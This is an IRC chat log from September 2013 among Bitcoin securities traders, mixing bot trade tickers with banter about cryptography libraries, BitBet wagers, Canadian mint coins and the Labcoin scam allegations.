http://www.telegraph.co.uk/news/worldnews/southamerica/argentina/10339296/Six-year-old-becomes-first-transgender-child-in-Argentina-to-change-identity.html Sep 28 10:58:59 Six-year-old becomes first transgender child in Argentina to change identity - Telegraph Sep 28 10:59:06 the Children, Youth and Family Secretary ruled children under 14 were capable of giving consent and cited international human rights Sep 28 10:59:19 get a load of this. children ubnder 14 are now capable of giving consent in argentina. Sep 28 10:59:36 whats new? Sep 28 11:00:06 i was capable at 14 Sep 28 11:00:39 i wanted to be a man, and i was well on my way Sep 28 11:01:19 !ticker btctc labcoin Sep 28 11:01:26 [BTCT:LABCOIN] 1D: 0.0002402 / 0.00048 / 0.0007776 (926722 shares, 447.8 BTC), 7D: 0.0002402 / 0.00125 / 0.002849 (5036941 shares, 6293.9 BTC), 30D: 0.0002402 / 0.00223 / 0.003989 (14342052 shares, 31935.7 BTC) Sep 28 11:01:29 except for the cryind and the stupid decisions Sep 28 11:01:33 why do you always took about kids n that? Sep 28 11:01:36 talk Sep 28 11:01:59 in further news, water on mars, bring a laser Sep 28 11:02:28 obsessed with kids or something Sep 28 11:02:47 i talk about a vast variety of topics. Sep 28 11:03:05 Vexual: i saw that on the weather channel of all things. Sep 28 11:03:08 what were you like at 14 vancleef? Sep 28 11:03:10 lol this is like the 5th time this week i seen you mention kids Sep 28 11:03:32 i've been scheming since i'm 14, what was your dream? Sep 28 11:03:43 VanCleef Aug 23 17:40:44 I need a bot on here that counts how many times you mention scams and scammers mp Sep 28 11:03:57 that theory didn;'t work out too well either. i just mention everything. Sep 28 11:04:30 fuck man ive been scemeing since i was born man, i could probably scheme this whole thing, and still walk away, wouldn't be no problem at all Sep 28 11:04:40 man Sep 28 11:04:43 AMAZING SCAM Sep 28 11:04:44 AMAZING COMPANY! Sep 28 11:05:30 scams and scammers are fine Sep 28 11:05:34 should mention that more :P Sep 28 11:05:34 amazingdoesitgrep ? Sep 28 11:05:46 blablamazing Sep 28 11:05:58 labcoinzing Sep 28 11:06:00 http://www.youtube.com/watch?v=CWxgfTMLtc0 Sep 28 11:06:02 Cheech & Chong - Up In Smoke - Funniest Scenes - YouTube Sep 28 11:07:06 in other news, http://en.wikipedia.org/wiki/Gas_gangrene Sep 28 11:07:56 yeah well if your coomputer turns into an amstrad, dont eat nothing from your fridge man Sep 28 11:08:20 damn that looks gnarly Sep 28 11:08:23 hate it when you get gangrene on your balls Sep 28 11:09:12 Instead, the discharge is often described as "sweetly putrid" or "dishwater pus" because it is much thinner than normal pus. Sep 28 11:09:15 mmm Sep 28 11:09:28 bbs, trying to eat dinner here Sep 28 11:09:35 YAAAA Sep 28 11:12:49 [BTCTC] [PETA-MINE] 1 @ 0.5231 BTC [+] Sep 28 11:20:08 mod6 did you get to the hemipelvectomy ? Sep 28 11:20:37 haha, yes. Sep 28 11:20:42 sounds nasty Sep 28 11:21:34 were you run over? Sep 28 11:21:35 i clicked on that cause of 'wtf' and yah, that looks really not good. apparently this is in the pelvis region. im not super clued on this stuff tho. Sep 28 11:22:13 sorta like a radical vasectomy Sep 28 11:22:50 i turned to alcoholism for my priaprism Sep 28 11:23:30 i just think 'how can life go on after such an operation' but alas, life goes on i suppose. Sep 28 11:24:14 life begins after 0.02 Sep 28 11:24:21 i think that guy bit it. Sep 28 11:24:45 i don't see how one can survive such a tramatic surgery Sep 28 11:25:20 but what do i know lol Sep 28 11:26:02 [BTCTC] [LABCOIN] 207 @ 0.000501 = 0.1037 BTC [+] Sep 28 11:26:09 *traumatic Sep 28 11:26:16 waaa Sep 28 11:26:41 rhink or the surgeon Sep 28 11:28:04 [HAVELOCK] [AM1] 3 @ 1.51015826 = 4.5305 BTC [-] {2} Sep 28 11:29:05 [HAVELOCK] [AM1] 5 @ 1.50544 = 7.5272 BTC [-] {4} Sep 28 11:30:06 [BTCTC] [LABCOIN] 1540 @ 0.00050945 = 0.7846 BTC [+] {2} Sep 28 11:31:07 [BTCTC] [LABCOIN] 1059 @ 0.00051782 = 0.5484 BTC [+] {2} Sep 28 11:31:28 so it went to 5 the other way, eventually. Sep 28 11:31:40 leo wheres the fuckin atms? Sep 28 11:33:08 i hope u got a good customs agent in poland or wherever Sep 28 11:34:33 http://youtu.be/R5mMRiiCwak Sep 28 11:34:36 Bottom percussion PATAX. - YouTube Sep 28 11:36:28 leo you got a loction for your sydney machine yet? Sep 28 11:37:13 [BTCTC] [FN] [BTC-GROWTH] 6 @ 0.082 = 0.492 BTC [+] Sep 28 11:46:22 [HAVELOCK] [AM100] 48 @ 0.013 = 0.624 BTC [-] {2} Sep 28 11:47:37 maybe this coming week i'll be able to test out my -assets socket script. Sep 28 11:48:26 being free of other obligations for the last ~27 days has been awesome for my side-projects. Sep 28 11:49:42 o hey. finally out of that horror job ? Sep 28 11:50:28 yes :) Sep 28 11:50:47 so glad. Sep 28 11:51:03 wd. Sep 28 11:51:52 thx. took 8 months of wrap up or more. but it was either ditch it, or get in far deeper as there was much more to do coming down the pipe. so to speak. Sep 28 11:52:29 [HAVELOCK] [AM1] 10 @ 1.38618998 = 13.8619 BTC [-] {8} Sep 28 11:53:07 in the mean time i've been plowing ahead on the android tool. done well with that. gotten RSA clearsign/enc/dec working. so that felt great. Sep 28 11:56:30 cool. Sep 28 11:56:53 i think we're going to see a famine of good crypto products the coming decade. Sep 28 11:57:05 sorta like it was with web apps in the 90s Sep 28 11:57:13 i can imagine. Sep 28 11:57:14 (a dead horse the vc noobs are still beating today) Sep 28 11:58:34 [BTCTC] [COGNITIVE] 1 @ 0.1423 BTC [-] Sep 28 11:58:48 it was another strange issue that i ran into a week ago. some of these crypto libs are a bit lacking compared to say what gnupg can do out of the box. Sep 28 11:59:34 some would say "deliberately so Sep 28 11:59:38 " Sep 28 11:59:45 bouncy-castle is this lib that is available for use, which works fine with RSA but when it comes to DH/DSS or DSA/ElGamal no worky. Sep 28 12:00:36 <[\\\]> the android bitcoin wallet uses bouncy-castle Sep 28 12:00:37 <[\\\]> or did Sep 28 12:00:38 <[\\\]> I forget Sep 28 12:00:43 i actually ended up going through my Applied Crypto book and implemented what amounts to doing this: http://cypherpunks.venona.com/date/1998/12/msg00290.html Sep 28 12:00:57 starting here: : ElGamal Encryption with DSA Sep 28 12:01:17 i think if you have to pick one cypher Sep 28 12:01:23 then rsa is probably the correct choice. Sep 28 12:01:39 [\\\]: ya, it might. i know that bitcoinj does Sep 28 12:01:44 i orginally thought elgamal was the correct choice, but seems i was wrong Sep 28 12:02:12 <[\\\]> mod6: bitcoin wallet is based off bitcoinj Sep 28 12:04:01 lol *shrug* Sep 28 12:06:26 had massive problems trying to use BC for not just DSA sigs, but using ElGamal subkey with DSA pub keys. Sep 28 12:06:44 so think i acutally coded myself around it. but now it should be a problem anymore. Sep 28 12:06:48 so that's awesome. Sep 28 12:06:56 *shouldn't Sep 28 12:08:10 im not really saying anything about bitcoin wallet or bitcoinj in particular. just that BC seems to be an incomplete implementation when held up next to gnupg Sep 28 12:08:50 or i could just be derp Sep 28 12:10:42 my current curiosity in the field is why isn't cramer–shoup more widely usedf. Sep 28 12:11:16 at any rate it should have been implemented in preference of elgamal Sep 28 12:11:22 or as you say, maybe im just derp. Sep 28 12:13:21 <[\\\]> bitcoin is an incomplete implementation Sep 28 12:13:26 <[\\\]> I don't think it was supposed to be Sep 28 12:14:17 i was discussing gpg/pgp/ssh keys/whatever else uses diffie-hellman Sep 28 12:15:56 yeah. i think that since elgamal is malleable, using the universal one-way hash to achieve the non-mallebility make cramer-shoup an interesting choice. Sep 28 12:16:11 the NSA probably put the kabosh on it lol Sep 28 12:17:16 moreover, that ind-cca2 is juicy Sep 28 12:17:35 afaik the only to satisfy the standard Sep 28 12:18:36 i'd really like to be enlightened as to what practical consideration recommends the use of elgamal still. Sep 28 12:23:26 yeah, its strange that elgamal wasn't stayed away from more since it doesn't conform to ind-cca1/2 Sep 28 12:23:58 i mean in the 90s right ? i can see it. but it's 2013. we got powah. Sep 28 12:27:04 yeah. its prettyamazing Sep 28 12:27:38 so here's an implementation of cramer-shoup, kinda looking at it now: http://www.verify-it.de/sub/crypter.html#SOURCES Sep 28 12:28:19 fun stuff is here: http://www.verify-it.de/applets/CryptoModule.java Sep 28 12:29:08 i don't presume to read crypto implementations as if i understand anything. Sep 28 12:29:40 here's the meat: alpha = hashBitList(pk.k,pk.p,pk.hash,bitListThree(pk.k,u1,u2,e)) Sep 28 12:34:53 maybe gnupg needs a patch where this is translated to C and DSA/ElGamal are removed Sep 28 12:35:33 if someone did that i'd certainly want to see what the maintainer does. Sep 28 12:37:12 [BTCTC] [ASICMINER-PT] 7 @ 1.45014285 = 10.151 BTC [-] {2} Sep 28 12:37:14 yah, that'd get interesting. Sep 28 12:37:58 http://packages.qa.debian.org/g/gnupg.html Sep 28 12:37:59 i've got all the 1.4.14 src local actually. i was doing some gdb of the sucker recently. Sep 28 12:38:01 Debian Package Tracking System - Sep 28 12:38:05 The current maintainer is looking for someone who can help with the maintenance of this package. Sep 28 12:38:50 ahh! Sep 28 12:39:06 maybe you should say hi Sep 28 12:39:17 now that you got out of a shitty job paying not enough for a lot of work Sep 28 12:39:25 time to get a shittier job paying nothing at all for a TON of work. Sep 28 12:40:15 [HAVELOCK] [AM1] 1 @ 1.3004 BTC [-] Sep 28 12:40:21 LOL Sep 28 12:40:57 i'll take a deeper look this coming week. Sep 28 12:43:40 next week too (after sunday) i'll be testing to make sure that the RSA enc/dec of the cmds is working as it should. Sep 28 12:44:19 actually, i already know it works since i tested them while enc/dec with my own key without having to leave the local system. Sep 28 12:45:25 i just need it to interact, get a response and display. once that's done. code cleanup + testing on my actual device instead of the emu. Sep 28 12:46:01 http://bitbet.us/bet/472/kncminer-will-deliver-asic-devices-before-october-1st/ Sep 28 12:46:06 then we'll see where that goes. Sep 28 12:46:07 i am guessing nobody actually got a device ? or ? Sep 28 12:46:14 BitBet - KnCMiner will deliver ASIC devices before October 1st Sep 28 12:47:24 "Suck it Pizza-dick I will be spending up your sweet sweet btc next weekend :D" << lol Sep 28 12:48:23 [BTCTC] [BTC-BOND] 174 @ 0.00979425 = 1.7042 BTC [-] {2} Sep 28 12:49:24 [BTCTC] [BTC-BOND] 3011 @ 0.0099 = 29.8089 BTC [+] {2} Sep 28 12:49:43 26-09-13 23:17 No 29 4.25000000 12LCk / 1Q5nb Sep 28 12:49:55 i like that best. 4 btc bet on like... 29/100`000 weight. Sep 28 12:50:38 yeah, yikes Sep 28 12:51:05 the calculator thingy is sweet tho Sep 28 12:51:16 <[\\\]> "ASICMINER will be higher than 2 BTC on October 31st 2013. If assbot relays any trade of any AsicMiner passthrough at or under 2 BTC per share at any point during October 31st, 2013, this bet resolves as No. Otherwise, the bet resolves as Yes." Sep 28 12:51:18 apparently it has just one major design flaw : Sep 28 12:51:21 <[\\\]> that bet is totally gameable Sep 28 12:51:21 it has to be used. Sep 28 12:51:26 haha Sep 28 12:51:30 <[\\\]> since there is no depth Sep 28 12:51:54 [\\\] asicminer is like... the only OTHER actual company publicly listed. Sep 28 12:51:57 what's one to do ? Sep 28 12:52:07 but yes, it's a weak bet, i wouldn't risk too much dust on it. Sep 28 12:52:17 <[\\\]> the text is weak Sep 28 12:52:26 how'd you make it ? Sep 28 12:52:40 <[\\\]> it probably would have been better to structure it was any trade >2 resolves as Yes Sep 28 12:53:21 <[\\\]> that would constitute "ASICMINER will be higher than 2 BTC on Oct 31, 2013" Sep 28 12:53:53 <[\\\]> otherwise, the title text should have read ASICMINER will continuously trade >2 BTC on Oct 31, 2013" Sep 28 12:53:55 equally easily gameable. Sep 28 12:54:17 <[\\\]> there's a difference between A trade and ALL trades on a given day Sep 28 12:54:22 <[\\\]> further, it doesn't give a timezone Sep 28 12:54:42 <[\\\]> and since you have multiple PT on multiple TZ, there's more room for error Sep 28 12:54:55 <[\\\]> but meh Sep 28 12:55:18 bitbet is gmt. Sep 28 12:55:41 <[\\\]> Where's that listed? Sep 28 12:56:12 <[\\\]> How do we know what time it is at bitbet? Sep 28 12:56:24 <[\\\]> nowhere does it say "Time is XYZ" Sep 28 12:57:01 in the faq man. Sep 28 12:57:17 What timezone is BitBet in? Sep 28 12:57:17 All times are GMT. Sep 28 12:57:18 http://bitbet.us/faq/#170 Sep 28 12:57:23 FAQ BitBet Sep 28 12:57:29 <[\\\]> ah right Sep 28 12:59:51 i gotta admit i really enjoy bitbet Sep 28 12:59:57 and think its pretty genius Sep 28 13:01:35 i personally think most of its potential hasn't really been unlocked yet. Sep 28 13:01:49 the comment section for instance... it's like purified 4chan with something to talk about. Sep 28 13:06:41 [BTCTC] [PETA-MINE] 1 @ 0.6498 BTC [+] Sep 28 13:07:42 [BTCTC] [ASICMINER-PT] 1 @ 1.476 BTC [+] Sep 28 13:12:46 [BTCTC] [ACTIVEMINING] 143 @ 0.001365 = 0.1952 BTC [-] Sep 28 13:18:35 http://www.dailykos.com/story/2013/09/27/1241960/-Twitter-CEO-Blown-Away-by-Iran-President-s-Account-as-Rouhani-Re-Tweets-State-Department Sep 28 13:18:45 Daily Kos: Twitter CEO Blown Away by Iran President's Account as Rouhani Re-Tweets State Department Sep 28 13:18:46 omg welcome to age of twatter diplomacy Sep 28 13:22:56 [HAVELOCK] [CBTC] 2741 @ 0.00032204 = 0.8827 BTC [+] {2} Sep 28 13:24:59 [HAVELOCK] [CBTC] 941 @ 0.00032204 = 0.303 BTC [+] Sep 28 13:26:00 [HAVELOCK] [CBTC] 15280 @ 0.00032202 = 4.9205 BTC [-] {3} Sep 28 13:27:01 [HAVELOCK] [CBTC] 4358 @ 0.00032202 = 1.4034 BTC [-] Sep 28 13:36:43 heh Sep 28 13:38:38 basically after the stunningly cold ownage putin delivered in the ny times, everyone wants to get a finger in the honey jar located in obama's recently decerebrated skull. Sep 28 13:38:53 "look, we can humiliate the us president too!" Sep 28 13:39:01 "almost as cool as putin" Sep 28 13:40:14 [BTCTC] [KENILWORTH] 799 @ 0.0014 = 1.1186 BTC [+] Sep 28 13:43:15 ugh, so many requests to cash out BTC-BOND. Anyone wants to get them or should I start liquidating a bit of stuff? Sep 28 13:45:07 Namworld i would say prepare for a freeze in finance. winter's coming. Sep 28 13:48:39 Sounds nice. Sep 28 13:52:13 Let's see what I can cash out... hmm. Sep 28 13:52:32 <[\\\]> what is btc-bond? Sep 28 13:53:07 Loan Sep 28 13:53:10 Namworld is back, been on vacation ? Sep 28 13:54:00 No, just visiting family. Caught a flu, didn't feel like going on the computer afterward. Sep 28 14:07:26 ok well I found what to liquidate. Sep 28 14:07:34 Goodbye fiat. Sep 28 14:10:44 [BTCTC] [COGNITIVE] 4 @ 0.1423 = 0.5692 BTC [-] Sep 28 14:30:49 Redeeming completed. Sep 28 14:55:27 [BTCTC] [PAJKA.BOND] 63 @ 0.01252062 = 0.7888 BTC [-] {6} Sep 28 14:56:28 [BTCTC] [PAJKA.BOND] 37 @ 0.00988143 = 0.3656 BTC [-] {3} Sep 28 14:58:30 [BTCTC] [BASIC-MINING] 3 @ 0.0565 = 0.1695 BTC [+] Sep 28 15:00:32 [HAVELOCK] [XBOND] [PAID] 0.69348300 BTC to 1`386`966 shares, 50 satoshi per share Sep 28 15:01:06 That's a lot of shares. Sep 28 15:04:05 wd Sep 28 15:04:36 [BTCTC] [FN] [DMS.SELLING] 250 @ 0.00486 = 1.215 BTC [+] Sep 28 15:28:44 Namworld, do you have the link to your google spreadsheet ? Sep 28 15:31:06 https://docs.google.com/spreadsheet/pub?key=0AvwwyRGyc1WgdGFKVlAtZVAzOGNqS1Brd05MUlFlT2c Sep 28 15:31:08 Namworld's Portfolio Sep 28 15:31:21 or you mean the google spreadsheet tools thread? Sep 28 15:32:38 nope that's the link i was looking for, thanks ! Sep 28 15:40:11 [BTCTC] [LABCOIN] 3000 @ 0.00048612 = 1.4584 BTC [-] {7} Sep 28 15:49:21 [BTCTC] [ASICMINER-PT] 1 @ 1.464 BTC [-] Sep 28 15:50:22 [HAVELOCK] [CBTC] 501 @ 0.00032199 = 0.1613 BTC [-] {2} Sep 28 15:53:25 [BTCTC] [ASICMINER-PT] 2 @ 1.466 = 2.932 BTC [+] {2} Sep 28 15:58:30 [HAVELOCK] [CFIG] 10 @ 0.10780556 = 1.0781 BTC [-] {2} Sep 28 16:00:53 hi Sep 28 16:04:14 Hello Sep 28 16:15:12 http://www.mint.ca/store/coin/100-for-100-fine-silver-coin-the-grizzly-2014-prod1730001#.UkbRdmQiGv4 Sep 28 16:15:16 $100 for $100 Fine Silver Coin - The Grizzly (2014) Sep 28 16:25:56 [HAVELOCK] [CBTC] 400 @ 0.00031902 = 0.1276 BTC [-] Sep 28 16:25:57 [HAVELOCK] [AM100] 33 @ 0.013 = 0.429 BTC [-] {2} Sep 28 16:26:57 [BTCTC] [ASICMINER-PT] 1 @ 1.439 BTC [-] Sep 28 16:26:57 [HAVELOCK] [CFIG] 5 @ 0.10780556 = 0.539 BTC [-] Sep 28 16:33:03 [BTCTC] [LABCOIN] 2035 @ 0.000509 = 1.0358 BTC [+] Sep 28 16:35:06 [BTCTC] [LABCOIN] 900 @ 0.0005188 = 0.4669 BTC [+] Sep 28 16:42:12 [HAVELOCK] [AM100] 10 @ 0.01285501 = 0.1286 BTC [-] {2} Sep 28 16:43:13 [HAVELOCK] [AM100] 200 @ 0.012816 = 2.5632 BTC [-] Sep 28 16:43:55 morning Sep 28 16:45:15 [BTCTC] [LABCOIN] 800 @ 0.0005188 = 0.415 BTC [+] Sep 28 16:47:32 Hello Sep 28 16:48:13 Namworld, out of curiosity what assets did you liquidate ? Sep 28 16:49:19 [BTCTC] [COGNITIVE] 26 @ 0.1423 = 3.6998 BTC [-] Sep 28 16:49:41 Fiat money Sep 28 16:49:43 !jd Sep 28 16:49:44 Just-Dice stat: 383 BTC profit, 43.2k BTC invested, 142.70 mio bets, 2.08 mio BTC wagered Sep 28 16:49:55 "[07:07] ok well I found what to liquidate. Sep 28 16:49:55 [07:07] Goodbye fiat. Sep 28 16:50:27 Who manages assbot? Sep 28 16:50:46 <- Sep 28 16:51:32 I guess I'll keep an offline list. Sep 28 16:52:22 [BTCTC] [ASICMINER-PT] 8 @ 1.43524999 = 11.482 BTC [-] {5} Sep 28 16:54:47 471 Sep 28 16:56:49 That much? eh Sep 28 16:57:27 [BTCTC] [ASICMINER-PT] 3 @ 1.43333333 = 4.3 BTC [-] {2} Sep 28 17:00:30 [BTCTC] [ACTIVEMINING] 201 @ 0.001382 = 0.2778 BTC [+] **** ENDING LOGGING AT Sat Sep 28 17:23:43 2013 **** BEGIN LOGGING AT Sat Sep 28 17:24:06 2013 Sep 28 17:24:30 -NickServ- You failed to identify in time for the nickname mircea_popescu Sep 28 17:27:57 [BTCTC] [ASICMINER-PT] 4 @ 1.432 = 5.728 BTC [-] {2} Sep 28 17:29:59 [BTCTC] [ASICMINER-PT] 3 @ 1.42933333 = 4.288 BTC [-] {2} Sep 28 17:33:02 [BTCTC] [BASIC-MINING] 20 @ 0.047049 = 0.941 BTC [-] {2} Sep 28 17:39:08 [BTCTC] [BTC-BOND] 52 @ 0.009551 = 0.4967 BTC [-] Sep 28 17:39:08 [HAVELOCK] [LABCO] 530 @ 0.00036174 = 0.1917 BTC [-] {10} Sep 28 17:41:17 is there a new url for mpex or still coming soon? Sep 28 17:45:14 [BTCTC] [ASICMINER-PT] 1 @ 1.429 BTC [-] Sep 28 17:56:57 pigeons: i guess same url, tomorrow noon gmt Sep 28 17:57:31 ;;later Sep 28 17:57:31 Error: "later" is not a valid command. Sep 28 17:57:36 hm Sep 28 17:57:40 help me out here Sep 28 17:58:12 ;;later tell nubbins` more info needed Sep 28 17:58:12 The operation succeeded. Sep 28 17:58:25 oh, hm Sep 28 17:58:41 ;;later tell chaang-noi http://www.mint.ca/store/coin/100-for-100-fine-silver-coin-the-grizzly-2014-prod1730001#.UkbtxmQiFKs Sep 28 17:58:41 The operation succeeded. Sep 28 17:59:02 not to split hairs, but "later" obv is a valid command Sep 28 17:59:06 f you, gribs! Sep 28 17:59:34 ;;later tell Sep 28 17:59:34 (later tell ) -- Tells the next time is in seen. can contain wildcard characters, and the first matching nick will be given the note. Sep 28 17:59:41 no, the command is latter tell Sep 28 18:01:16 those coins are very interesting, but not for us eurofags :( Sep 28 18:05:25 play your cards right, i might sell you one ;) Sep 28 18:05:36 i have a few of these too: http://www.mint.ca/store/coin/20-for-20-fine-silver-coin-iceberg-and-whale-2013-prod1690016?o_action=crossSell Sep 28 18:06:09 it's a poor price for the amount of silver Sep 28 18:06:22 but they're sold at face value, so there's no risk of losing money on the deal Sep 28 18:09:17 The canadian mints makes WAY too many coins. Sep 28 18:09:44 There's hundreds upon hundreds of designs in all sort of denominations and metal contents. Sep 28 18:11:14 oh, so there's a face value that is actually higher than the silver value? Sep 28 18:13:28 pankkake: yep, it's an oddity in that regard Sep 28 18:13:35 the 1oz silver rounds have a face value of $5 Sep 28 18:13:53 and the $20 for $20 silver coins are, i think, 1/4oz Sep 28 18:14:06 Namworld: they make SO MANY coins. Didja see all the superman ones? Sep 28 18:15:54 find me a coin with a face value equal to its silver content Sep 28 18:16:13 exactly Sep 28 18:16:32 i guess i'm mildly confused about the lol Sep 28 18:16:50 ah yeah Sep 28 18:17:13 well, see, that's what's funny about these 20 for 20/100 for 100 coins Sep 28 18:17:41 they could just as well be steel coins Sep 28 18:18:06 The face value is always completly unrelated to metal contents Sep 28 18:18:06 well, no Sep 28 18:18:41 ... **** ENDING LOGGING AT Sat Sep 28 18:18:55 2013 **** BEGIN LOGGING AT Sat Sep 28 18:45:48 2013 Sep 28 18:49:18 lel Sep 28 18:50:10 you know that krypton is real, right? Sep 28 18:50:33 nah Sep 28 18:50:36 i wish ;( Sep 28 18:51:07 http://www.mint.ca/store/coin/75-14kt.-gold-coin-supermantrade-the-early-years-mintage-2000-2013-prod1690049#.Ukb66WQiFKs Sep 28 18:51:10 $75 14-Kt. Gold Coin - Superman™: The Early Years - Mintage: 2,000 (2013) Sep 28 18:51:14 conversation just went full circle Sep 28 18:51:38 and it's the Man of Steel Sep 28 18:51:42 !!! Sep 28 18:51:51 mind blown Sep 28 18:51:55 although i have to say Sep 28 18:52:03 this whole "coloured coin" kick the mint's on lately sucks Sep 28 18:52:08 they look so crappy Sep 28 18:52:24 http://www.mint.ca/store/buy/coloured_coins-cat200032 Sep 28 18:52:28 Royal Canadian Mint Coloured Coins Sep 28 18:54:20 There's glow in the dark coins too Sep 28 18:54:31 also buttcoins Sep 28 18:54:37 I hope someone does My Little Pony coins Sep 28 18:54:52 http://www.mint.ca/store/coin/1-oz-fine-silver-coin-canadian-maple-canopy-spring-mintage-7500-2013-prod1670009#.Ukb7uWQiFKs Sep 28 18:54:55 that one's kinda cool Sep 28 18:54:55 1 oz Fine Silver Coin - Canadian Maple Canopy (Spring) - Mintage 7500 (2013) Sep 28 18:54:59 most of them are butt ugly Sep 28 18:55:28 it's the only one that didn't strike me as ugly yeah Sep 28 19:00:49 anyway i have tenants moving in tomorrow, gotta clean up a bit Sep 28 19:00:50 peace Sep 28 19:11:39 [BTCTC] [KENILWORTH] 444 @ 0.0014 = 0.6216 BTC [+] {2} Sep 28 19:39:05 [BTCTC] [ASICMINER-PT] 7 @ 1.445 = 10.115 BTC [+] Sep 28 19:47:13 [BTCTC] [LABCOIN] 10000 @ 0.00051671 = 5.1671 BTC [+] {5} Sep 28 19:49:15 [BTCTC] [S.MPOE-PT] 1229 @ 0.00066276 = 0.8145 BTC [+] {4} Sep 28 19:56:22 [BTCTC] [ASICMINER-PT] 1 @ 1.432 BTC [-] Sep 28 20:09:35 [HAVELOCK] [CBTC] 500 @ 0.0003191 = 0.1596 BTC [+] Sep 28 20:13:39 [BTCTC] [BASIC-MINING] 8 @ 0.04700125 = 0.376 BTC [-] {2} Sep 28 20:13:40 [BTCTC] [COGNITIVE] 1 @ 0.1423 BTC [-] Sep 28 20:15:41 [BTCTC] [LABCOIN] 3502 @ 0.00053703 = 1.8807 BTC [+] {5} Sep 28 20:19:45 [BTCTC] [ACTIVEMINING] 264 @ 0.001388 = 0.3664 BTC [+] Sep 28 20:20:46 [BTCTC] [ACTIVEMINING] 396 @ 0.00138833 = 0.5498 BTC [+] {3} Sep 28 20:27:53 [BTCTC] [LABCOIN] 3637 @ 0.00055946 = 2.0348 BTC [+] {7} **** BEGIN LOGGING AT Sun Sep 29 03:33:15 2013 Sep 29 03:33:55 [BTCTC] [LABCOIN] 15486 @ 0.00025026 = 3.8755 BTC [-] {2} Sep 29 03:35:21 "There will be people who end up homeless over this, people who will lose their life savings over it." Sep 29 03:35:52 Like BS&T? Sep 29 03:35:57 [HAVELOCK] [LABCO] 644 @ 0.00030559 = 0.1968 BTC [-] {5} Sep 29 03:36:58 [HAVELOCK] [LABCO] 670 @ 0.00025171 = 0.1686 BTC [-] {7} Sep 29 03:40:01 [BTCTC] [ACTIVEMINING] 2453 @ 0.0013943 = 3.4202 BTC [+] {4} Sep 29 03:40:01 [BTCTC] [PETA-MINE] 1 @ 0.5221 BTC [-] Sep 29 03:40:01 [BTCTC] [LABCOIN] 3766 @ 0.0003085 = 1.1618 BTC [+] {4} Sep 29 03:42:03 [BTCTC] [LABCOIN] 5000 @ 0.00032 = 1.6 BTC [+] Sep 29 03:43:11 smickles : as far as i know it should be safe. keys can be checked tho, which please do. Sep 29 03:43:20 pankkake which gem is this ? Sep 29 03:43:30 labcoin Sep 29 03:44:02 now linked to many previous scams Sep 29 03:44:06 jhahaha Sep 29 03:44:23 people losing their homes over labcoin? they'd prob lose their home anyway Sep 29 03:44:43 GREP GATE GETFILE GETINT GETSTR GHOST GUI Sep 29 03:45:23 yes, it feels so great to know shit 3 months in advance. marketing baby. Sep 29 03:46:07 [BTCTC] [LABCOIN] 1550 @ 0.000332 = 0.5146 BTC [+] Sep 29 03:46:22 they'll end up in coal mines Sep 29 03:46:25 smickles (also, those vulns were reported/known in 2008) Sep 29 03:46:26 at least they'll be mining Sep 29 03:46:33 haha Sep 29 03:53:13 [BTCTC] [LABCOIN] 11234 @ 0.00032 = 3.5949 BTC [-] Sep 29 03:54:55 http://www.reddit.com/user/labcoinscam not much drama yet Sep 29 03:54:57 overview for labcoinscam Sep 29 03:58:33 mircea_popescu: how do you map your blogread-credits to a user? Sep 29 03:58:59 ip or pw Sep 29 04:00:53 ie. use a proxy™ Sep 29 04:01:22 i already figured that it does work with hidemyass' webproxy Sep 29 04:08:29 [BTCTC] [ACTIVEMINING] 1096 @ 0.00139 = 1.5234 BTC [-] {4} Sep 29 04:10:31 [BTCTC] [LABCOIN] 2500 @ 0.00034264 = 0.8566 BTC [+] {2} Sep 29 04:10:50 o hey mp i used contents of your blogpost to populate bash a little, thats because im such a leeching prick Sep 29 04:12:33 [BTCTC] [LABCOIN] 19579 @ 0.000341 = 6.6764 BTC [-] Sep 29 04:13:19 lol. Sep 29 04:13:23 you mean the stuff i got off the log ? Sep 29 04:13:28 yep Sep 29 04:13:30 :) Sep 29 04:13:31 THEIF Sep 29 04:13:47 at least i admit it Sep 29 04:14:10 you'll go to hell whereby you will spend your time being continuously drowned in milk. Sep 29 04:14:14 o wait. Sep 29 04:14:22 lol Sep 29 04:17:38 [BTCTC] [LABCOIN] 375 @ 0.00031 = 0.1163 BTC [-] Sep 29 04:18:16 heheheh Sep 29 04:22:54 "All the informations that are being posted are totally made up and there's no direct connection between Labcoin and the people mentioned." https://bitcointalk.org/index.php?topic=263445.msg3258129#msg3258129 Sep 29 04:24:45 the informations and the polices! Sep 29 04:25:47 i have aircrafts full of sheeps! Sep 29 04:25:58 hehe, at least we know he's likely one of those Italians Sep 29 04:26:29 well yeah alberto did mention he invested some clients btc in asics Sep 29 04:26:43 which was not his biz plan Sep 29 04:26:47 [BTCTC] [LABCOIN] 560 @ 0.00036292 = 0.2032 BTC [+] {5} Sep 29 04:26:48 btw Sep 29 04:27:13 but even if that is true, he apparently just pocketed the money Sep 29 04:29:07 $avg Sep 29 04:29:08 mircea_popescu: 134.61 Sep 29 04:30:56 whats all this about labcoin scam? Sep 29 04:31:18 http://www.reddit.com/r/BitcoinStocks/comments/1ncdf1/labcoin_outed_as_a_scam/ Sep 29 04:31:20 Labcoin outed as a scam : BitcoinStocks Sep 29 04:31:24 reddit discovers the world at their own pace. Sep 29 04:31:52 [BTCTC] [LABCOIN] 4034 @ 0.00034409 = 1.3881 BTC [-] {3} Sep 29 04:32:28 I recreated an account just to upvote Sep 29 04:32:53 [BTCTC] [LABCOIN] 566 @ 0.00034369 = 0.1945 BTC [-] {2} Sep 29 04:33:00 "Ugh, I'm looking forward to the day a reputable stock exchange or two pops up where in order to get listed you have to establish some bona fides. Sep 29 04:33:28 i wonder what qualifies as a bona fide Sep 29 04:35:56 [HAVELOCK] [AM100] 26 @ 0.01400003 = 0.364 BTC [-] {3} Sep 29 04:36:32 fucktards. Sep 29 04:37:09 "we do not know shit therefore the world doesn't exist. we can do anything therefore we will create it! gaze upon us, we are the 20something illiterate socially awkward unemployable GOD!" Sep 29 04:37:14 bona fide fucktards Sep 29 04:37:25 bonas fides Sep 29 04:39:17 !t bt labcoin Sep 29 04:39:18 [BTCT:LABCOIN] 1D: 0.0002502 / 0.00037 / 0.0006599 (765722 shares, 281.3 BTC), 7D: 0.0002402 / 0.0011 / 0.002849 (5518061 shares, 6067.6 BTC), 30D: 0.0002402 / 0.00208 / 0.003989 (14518185 shares, 30173.7 BTC) Sep 29 04:45:19 pankkake where's the quote from ? Sep 29 04:45:30 https://www.youtube.com/watch?v=fmFjmvwPGKU Sep 29 04:45:32 Colored Coins - YouTube Sep 29 04:45:42 mircea_popescu: http://www.reddit.com/r/Bitcoin/comments/1ncckq/labcoin_has_been_outed_as_a_scam_run_by_notorious/cchbo4v Sep 29 04:45:56 colored coins a bit racist 